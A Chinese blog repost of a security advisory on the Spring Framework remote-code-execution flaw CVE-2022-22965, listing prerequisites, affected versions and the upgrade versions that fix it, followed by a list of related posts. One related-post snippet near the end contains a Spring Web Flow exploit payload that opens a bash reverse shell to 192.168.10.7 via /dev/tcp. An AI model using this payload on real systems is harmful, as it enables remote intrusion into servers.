突发,Spring框架发现重大漏洞!

最新推荐文章于 2024-05-20 16:50:15 发布
最新推荐文章于 2024-05-20 16:50:15 发布
阅读量775 收藏 1
点赞数 1
文章标签: java spring boot spring 面试 maven
原文链接:https://mp.weixin.qq.com/s?__biz=MzI2MTIzMzY3Mw==&mid=2247522278&idx=3&sn=1664e169ba3bd767bd4fa37f7bbff09f&chksm=ea5f5a80dd28d396ac4d79433f82d2907273957a3ba43a1bd14f2fae9f16a6f4acac4c9fe6c3&scene=126&&sessionid=0
版权

上一篇:字节跳动面试经验总结,已顺利拿到offer!

近日,spring 框架发布重大漏洞信息。

该漏洞编号为:CVE-2022-22965: Spring Framework RCE via Data Binding on JDK 9+
漏洞级别:Critical

ad53aa9883bd3576b5cf52e4f8d70140.png

详细描述为:

在JDK 9+上运行的Spring MVC或Spring WebFlux应用程序可能容易通过数据绑定进行远程代码执行(RCE)。该漏洞要求应用程序作为WAR部署在Tomcat上运行。如果应用程序部署为Spring Boot可执行jar,即默认jar,则不受漏洞的攻击。然而,脆弱性的性质更为普遍,可能还有其他方法可以利用它。

这些是漏洞执行的先决条件:

1.JDK 9或更高

2.Apache Tomcat作为Servlet容器

3.打包为WAR

4.依赖Spring-webmvc或spring-webflux

受影响的Spring Framework版本:

  1. Spring Framework5.3.0 到 5.3.17

  2. Spring Framework5.2.0 到 5.2.19

  3. 较旧的、不受支持的版本也受到影响

官方声明地址:https://tanzu.vmware.com/security/cve-2022-22965

解决方案

因为这次不是网传,而是Spring官宣,所以解决方案已经相对完善和容易了,受影响的用户可以通过下面的方法解决该漏洞的风险:

Spring 5.3.x用户升级到5.3.18+
Spring 5.2.x用户升级到5.2.20+
Spring Boot 2.6.x用户升级到2.6.6+
Spring Boot 2.5.x用户升级到2.5.12+

感谢您的阅读,也欢迎您发表关于这篇文章的任何建议,关注我,技术不迷茫!小编到你上高速。

    · END ·

最后,关注公众号互联网架构师,在后台回复:2T,可以获取我整理的 Java 系列面试题和答案,非常齐全。

正文结束

推荐阅读 ↓↓↓

1.心态崩了!税前2万4,到手1万4,年终奖扣税方式1月1日起施行~

2.深圳一普通中学老师工资单曝光,秒杀程序员,网友:敢问是哪个学校毕业的?

3.从零开始搭建创业公司后台技术栈

4.程序员一般可以从什么平台接私活?

5.清华大学:2021 元宇宙研究报告!

6.为什么国内 996 干不过国外的 955呢?

7.这封“领导痛批95后下属”的邮件,句句扎心!

8.15张图看懂瞎忙和高效的区别!

dc03506ce0f2468c944ff693c88c79ae.gif

互联网架构
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java框架漏洞_Spring 框架漏洞集合
weixin_42514750的博客
02-25 5520
虽说是Spring框架漏洞,但以下包含并不仅Spring Framework,Spring Boot,还有Spring Cloud,Spring Data,Spring Security等。CVE-2010-1622 Spring Framework class.classLoader类远程代码执行影响版本:SpringSource Spring Framework 3.0.0 - 3.0.2、S...
最新漏洞Spring Framework远程代码执行漏洞
「 虚幻私塾」
04-01 482
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 Spring Framework远程代码执行漏洞 发布时间 2022-03-31 漏洞等级 High CVE编号 CVE-2022-22965 影响范围:同时满足以下三个条件可确定受此漏洞影响: JDK 版本 >= 9 使用了 Spring 框架或衍生框架 项目中
Spring 官方证实!框架漏洞,JDK 9 及以上版本均受影响
weixin_45727359的博客
04-03 303
继 Log4j 2 之后,听闻 Java 再次遭到漏洞攻击,这一次,似乎情况也更为严重,因为受到影响的是 Java 平台的开源全栈应用程序框架和控制反转容器实现——Spring 家族,而且网传漏洞还不止一个。一直以来,Spring 是编程开发的必选技术之一,此前一位名为 Bogdan N. 的全栈开发者甚至评价道:“学习 Java、学习 Spring 框架,你永远都不会失...
springCloud升级springweb的问题
qq_21526409的博客
05-20 1595
因为springboot-2.6.13已经不再维护了,直接从gateway的依赖里面去掉spring-web,然后重新引入spring-web-5.3.33会报一个错误。路径:/opt/gateway-0.0.1-SNAPSHOT.jar(BOOT-INF/lib/spring-web-5.3.23.jar)项目之前使用的时候springgboot-2.6.13,gateway-3.1.4。软件:spring-web(jar) 5.3.23。解决办法就是要升级spring-web的版本。
【网络安全】Spring框架漏洞总结(一)
kali_Ma的博客
09-10 2613
Spring简介 SpringJava EE编程领域的一个轻量级开源框架,该框架由一个叫Rod Johnson的程序员在2002年最早提出并随后创建,是为了解决企业级编程开发中的复杂性,业务逻辑层和其他各层的松耦合问题,因此它将面向接口的编程思想贯穿整个系统应用,实现敏捷开发的应用型框架框架的主要优势之一就是其分层架构,分层架构允许使用者选择使用哪一个组件,同时为J2EE应用程序开发提供集成的框架。 2009年9月Spring 3.0 RC1发布后,Spring就引入了SpEL (Spring Expr
Java 开发 框架安全:Spring 命令执行漏洞.(CVE-2022-22965)
网络安全领域___专研者.
05-07 764
Spring 框架是一个用于构建企业级应用程序的开源框架。它提供了一种全面的编程和配置模型,可以简化应用程序的开发过程。Spring 框架的核心特性包括依赖注入(Dependency Injection)、面向切面编程(Aspect-Oriented Programming)、声明式事务管理(Declarative Transaction Management)等。依赖注入是 Spring 框架的核心概念之一,它通过将对象之间的依赖关系外部化,使得对象之间的协作更加灵活和可测试。
Spring框架之快速搭建Spring Boot项目教程指南!0基础!!易懂!!.html
最新发布
07-11
该教程《Spring框架之快速搭建Spring Boot项目教程指南》主要介绍如何从零开始快速搭建和开发一个Spring Boot项目。内容涵盖了Spring Boot的基本概念、环境搭建、项目创建、控制器编写、数据库操作、错误处理、安全...
spring框架2016
08-26
最新spring框架2016视频教程,包含源码和笔记。小白入手实用教程。
Spring Boot快速搭建Spring框架教程
08-29
Spring Boot 快速搭建 Spring 框架教程 Spring BootSpring 框架的一个新的子项目,用于创建 Spring 4.0 项目。它可以自动配置 Spring 的各种组件,并不依赖代码生成和 XML 配置文件。Spring Boot 也提供了对于...
Spring框架学习思维导图
06-11
Spring框架知识的简单汇总,只列举常用的几项.
Spring Framework反射型文件下载漏洞
05-08
Spring Framework版本5.2.0-5.2.8、5.1.0-5.1.17、5.0.0-5.0.18、4.3.0-4.3.28和更旧的不受支持版本中,可能会绕过CVE-2015-5211对RFD攻击的保护,具体取决于通过使用jsessionid路径参数使用的浏览器。
spring常见漏洞总结
hongduilanjun的博客
07-21 4974
Spring的英文翻译为春天,可以说是给Java程序员带来了春天,因为它极大的简化了开发。得出一个公式Spring=春天=Java程序员的春天=简化开发。最后的简化开发正是Spring框架带来的最大好处。Spring是一个开放源代码的设计层面框架,它是于2003年兴起的一个轻量级的Java开发框架。由RodJohnson创建,其前身为Interface21框架,后改为了Spring并且正式发布。Spring是为了解决企业应用开发的复杂性而创建的。...
spring注解使用不当产生的一个Bug
徐文辉的专栏
04-18 469
Controller 类文件:public Controller { @Autowired private Service service; public void contro(){ service.serv(); } public static void main(String[] args){ new Controller().contr
【网络安全】Spring框架漏洞总结(二)
qq_44005305的博客
01-06 707
Spring Web Flow是Spring的一个子项目,主要目的是解决跨越多个请求的、用户与服务器之间的、有状态交互问题,提供了描述业务流程的抽象能力。Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。
记录一次vulhub:spring 代码执行漏洞复现 (CVE-2017-4971)
sszsNo1的博客
06-29 136
vulhub:spring 代码执行漏洞复现 (CVE-2017-4971)
spring常见漏洞(前言)
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
01-13 633
Spring的英文翻译为春天,可以说是给Java程序员带来了春天,因为它极大的简化了开发。得出一个公式:Spring = 春天 = Java程序员的春天 = 简化开发。最后的简化开发正是Spring框架带来的最大好处。Spring是一个开放源代码的设计层面框架,它是于2003 年兴起的一个轻量级的Java 开发框架。由Rod Johnson创建,其前身为Interface21框架,后改为了Spring并且正式发布。Spring是为了解决企业应用开发的复杂性而创建的。
string 格式化字符串漏洞 xctf
qq_62539372的博客
04-07 3487
借着这道题了解一下格式化字符串漏洞 查看一下保护 放进64位的IDA分析一下程序 这道题涉及C语言的指针 好好学C main() 分析得v3=v4 v4(v3) 8ull 前四位是68 后四位85 执行sud_400D72() 传的参数是v4 继续执行 分析一下 输入 个名字 不能太长 然后east 1 关键的部分来了 print(&format,&format)格式化字符串漏洞 给我个地址 就是第一个秘密 (好好思考一下 关键是悟) 把85传进去 看一下是第几个参数呢
Spring官宣网传大漏洞,并提供解决方案
程序猿DD
04-01 3064
Spring沦陷了!这样的标题这几天是不是看腻了?然而,仔细看看都是拿着之前的几个毫不相干的CVE来大吹特吹。所以,昨天发了一篇关于最近网传的Spring漏洞的文章,聊了聊这些让人迷惑的营销文、以及提醒大家不要去下载一些利用漏洞提供补丁的钓鱼内容。而对于这个网传的漏洞,依然保持关注状态,因为确实可能存在,只是没有官宣。 就在不久前(3月31日晚),Spring社区发布了一篇名为《Spring Framework RCE, Early Announcement》的文章,官宣了最近网传的Spring漏洞。这也
spring漏洞合集及其poc合集
weixin_46626737的博客
08-21 498
在post请求体中加上_eventId_confirm=&_csrf=4962b53e-b8c7-4290-8fa4-10dd87fd6ead&_(new java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/192.168.10.7/2233 +0>%261")).start()=vulhub。1)漏洞原理:Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值